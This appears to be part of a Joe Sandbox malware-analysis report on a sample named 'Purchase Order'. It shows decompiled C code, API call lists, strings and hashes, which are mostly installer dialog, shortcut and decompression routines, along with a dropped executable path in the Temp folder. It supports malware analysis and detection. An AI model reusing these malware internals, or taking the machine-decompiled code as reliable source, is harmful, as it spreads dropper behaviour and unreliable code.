0x0040583f
0x00405853
0x0040585c
0x00405865
0x00405875
0x00405881
0x00405881
0x00000000

APIs

GetDlgItem.USER32 ref: 0040573C
GetDlgItem.USER32 ref: 0040574B
GetClientRect.USER32 ref: 00405788
GetSystemMetrics.USER32 ref: 0040578F
SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
ShowWindow.USER32(?,00000008), ref: 0040582B
GetDlgItem.USER32 ref: 0040584C
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
GetDlgItem.USER32 ref: 0040575A

Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC

GetDlgItem.USER32 ref: 0040589E
CreateThread.KERNEL32 ref: 004058AC
CloseHandle.KERNEL32(00000000), ref: 004058B3
ShowWindow.USER32(00000000), ref: 004058D7
ShowWindow.USER32(?,00000008), ref: 004058DC
ShowWindow.USER32(00000008), ref: 00405926
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
CreatePopupMenu.USER32 ref: 0040596B
AppendMenuW.USER32 ref: 0040597F
GetWindowRect.USER32 ref: 0040599F
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
OpenClipboard.USER32(00000000), ref: 00405A00
EmptyClipboard.USER32 ref: 00405A06
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
GlobalLock.KERNEL32 ref: 00405A1C
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
GlobalUnlock.KERNEL32(00000000), ref: 00405A50
SetClipboardData.USER32 ref: 00405A5B
CloseClipboard.USER32 ref: 00405A61

Strings

{, xrefs: 00405944

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
Opcode Fuzzy Hash: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040498A Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040498A(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x42c240;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x436000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405B81(0x3fb, _t146);
					E004067C4(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405B81(0x3fb, _t146);
							if(E00405F14(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E0040653D(0x42b238, _t146);
							_t87 = E0040690A(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040653D(0x42b238, _t146);
								_t89 = E00405EB7(0x42b238);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x42b238,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x42b238) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x42b238,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405E58(0x42b238);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x42b238) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404E27(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x433edc + 0x10)) != _t158) {
									E00404E0F(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x42b228);
									} else {
										E00404D46(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x434fa4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004044BB(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42d258 == _t158) {
									E004048E3();
								}
								 *0x42d258 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x42d268;
							_v60 = E00404CE0;
							_v56 = _t146;
							_v68 = E0040657A(_t146, 0x42d268, _t167, 0x42ba40, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405E0C(_t146);
								_t125 =  *((intOrPtr*)( *0x434f10 + 0x11c));
								if( *((intOrPtr*)( *0x434f10 + 0x11c)) != 0 && _t146 == L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp") {
									E0040657A(_t146, 0x42d268, _t167, 0, _t125);
									if(lstrcmpiW(0x432ea0, 0x42d268) != 0) {
										lstrcatW(_t146, 0x432ea0);
									}
								}
								 *0x42d258 =  *0x42d258 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405E83(_t146) != 0 && E00405EB7(_t146) == 0) {
						E00405E0C(_t146);
					}
					 *0x433ed8 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00404499(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404499(_t167);
					E004044CE(_t166);
					_t138 = E0040690A(8);
					if(_t138 == 0) {
						L53:
						return E00404500(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}

0x0040498a
0x00404990
0x00404996
0x004049a3
0x004049b1
0x004049b4
0x004049bc
0x004049c2
0x004049c2
0x004049ce
0x004049d1
0x00404a3f
0x00404a46
0x00404b1d
0x00404b24
0x00404b33
0x00404b33
0x00404b37
0x00404b41
0x00404b4e
0x00404b50
0x00404b50
0x00404b5e
0x00404b65
0x00404b6c
0x00404b6f
0x00404bab
0x00404bad
0x00404bb3
0x00404bb8
0x00404bbc
0x00404bbe
0x00404bbe
0x00404bda
0x00000000
0x00404bdc
0x00404bdf
0x00404bed
0x00404bf3
0x00404bf4
0x00404bf7
0x00404bfa
0x00000000
0x00404bfa
0x00404b71
0x00404b73
0x00404b77
0x00000000
0x00000000
0x00000000
0x00000000
0x00404b79
0x00404b79
0x00404b86
0x00404b8b
0x00000000
0x00000000
0x00404b8f
0x00404b91
0x00404b91
0x00404b9a
0x00404b9c
0x00404ba1
0x00404ba4
0x00404ba9
0x00000000
0x00000000
0x00000000
0x00000000
0x00404ba9
0x00404c06
0x00404c10
0x00404c13
0x00404c16
0x00404c1d
0x00404c1d
0x00404c1f
0x00404c1f
0x00404c24
0x00404c26
0x00404c2e
0x00404c35
0x00404c37
0x00404c42
0x00404c42
0x00404c37
0x00404c52
0x00404c5c
0x00404c64
0x00404c7f
0x00404c66
0x00404c6f
0x00404c6f
0x00404c64
0x00404c84
0x00404c89
0x00404c8e
0x00404c97
0x00404c97
0x00404ca0
0x00404ca2
0x00404ca2
0x00404cae
0x00404cb6
0x00404cc0
0x00404cc0
0x00404cc5
0x00000000
0x00404cc5
0x00404b6f
0x00404b26
0x00404b2d
0x00000000
0x00000000
0x00000000
0x00404b2d
0x00404a4c
0x00404a55
0x00404a6f
0x00404a74
0x00404a7e
0x00404a85
0x00404a91
0x00404a94
0x00404a97
0x00404a9e
0x00404aa6
0x00404aa9
0x00404aad
0x00404ab4
0x00404abc
0x00404b16
0x00404abe
0x00404abf
0x00404ac6
0x00404ad0
0x00404ad8
0x00404ae5
0x00404af9
0x00404afd
0x00404afd
0x00404af9
0x00404b02
0x00404b0f
0x00404b0f
0x00404abc
0x00000000
0x00404a74
0x00404a62
0x00000000
0x00000000
0x00404a68
0x00000000
0x004049d3
0x004049e0
0x004049e9
0x004049f6
0x004049f6
0x004049fd
0x00404a03
0x00404a0c
0x00404a0f
0x00404a12
0x00404a1a
0x00404a1d
0x00404a20
0x00404a26
0x00404a2d
0x00404a34
0x00404ccb
0x00404cdd
0x00404a3a
0x00404a3d
0x00000000
0x00404a3d
0x00404a34

APIs

GetDlgItem.USER32 ref: 004049D9
SetWindowTextW.USER32(00000000,?), ref: 00404A03
SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
CoTaskMemFree.OLE32(00000000), ref: 00404ABF
lstrcmpiW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe",0042D268,00000000,?,?), ref: 00404AF1
lstrcatW.KERNEL32(?,"C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe"), ref: 00404AFD
SetDlgItemTextW.USER32 ref: 00404B0F

Part of subcall function 00405B81: GetDlgItemTextW.USER32(?,?,00000400,00404B46), ref: 00405B94

Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,?,00403508,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403810), ref: 00406827
Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403810), ref: 00406836
Part of subcall function 004067C4: CharNextW.USER32(?,00000000,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,?,00403508,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403810), ref: 0040683B
Part of subcall function 004067C4: CharPrevW.USER32(?,?,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,?,00403508,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403810), ref: 0040684E

GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404BD2
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED

Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
Part of subcall function 00404D46: SetDlgItemTextW.USER32 ref: 00404E03

Strings

"C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe", xrefs: 00404AEB, 00404AF0, 00404AFB
C:\Users\user~1\AppData\Local\Temp, xrefs: 00404ADA
A, xrefs: 00404AAD

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe"$A$C:\Users\user~1\AppData\Local\Temp
API String ID: 2624150263-3325408878
Opcode ID: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
Opcode Fuzzy Hash: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129
comCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004021AA() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405E83( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4085f0, _t83, 1, 0x4085e0, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x408600, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}

0x004021b3
0x004021bd
0x004021c7
0x004021d1
0x004021dc
0x004021df
0x004021f9
0x004021fc
0x00402202
0x00402205
0x0040220f
0x00402213
0x00402213
0x00402218
0x00402229
0x00402231
0x004022e8
0x004022e8
0x004022ef
0x00402237
0x00402237
0x00402246
0x0040224a
0x0040224d
0x00402253
0x00402261
0x00402264
0x00402266
0x00402271
0x00402271
0x00402276
0x00402278
0x0040227f
0x0040227f
0x00402282
0x0040228b
0x0040228e
0x00402294
0x00402296
0x004022a0
0x004022a0
0x004022a3
0x004022ac
0x004022af
0x004022b8
0x004022be
0x004022c0
0x004022ce
0x004022ce
0x004022d1
0x004022d7
0x004022d7
0x004022da
0x004022e0
0x004022e6
0x004022fb
0x00000000
0x00000000
0x00000000
0x004022e6
0x004022f1
0x00402c2d
0x00402c39

APIs

CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229

Strings

C:\Users\user~1\AppData\Local\Temp, xrefs: 00402269

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user~1\AppData\Local\Temp
API String ID: 542301482-3107243751
Opcode ID: 58fea544f8465b7ca695cd277db4a94267474b575ac50a9b019070cedb53bd32
Instruction ID: 5977cb51530078b600b156af0050786de557c4b464dd586e6a5beaa7a0440451
Opcode Fuzzy Hash: 58fea544f8465b7ca695cd277db4a94267474b575ac50a9b019070cedb53bd32
Instruction Fuzzy Hash: A7411571A00208EFCF40DFE4C989E9D7BB5BF49348B20456AF905EB2D1DB799981CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E00406484( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E0040653D();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x00402923
0x0040293e
0x00402949
0x0040294a
0x00402a94
0x00402925
0x00402928
0x0040292b
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: e3c555fdbd57f1008fac0fd93a6eb0fb110785489bc5405dabc14b2674c5a242
Instruction ID: 3f6fbcf0fd4d311cdd608d5f72697756ed96b8559223cd5d9f1c4d92bc61f1b3
Opcode Fuzzy Hash: e3c555fdbd57f1008fac0fd93a6eb0fb110785489bc5405dabc14b2674c5a242
Instruction Fuzzy Hash: 3CF08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E159B29

Uniqueness

Uniqueness Score: -1.00%

Function 00406D85 Relevance: .3, Instructions: 334
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E00406D85(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E004074F4( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x4084d4; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x4084d4; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E0040755C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M004074B4))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
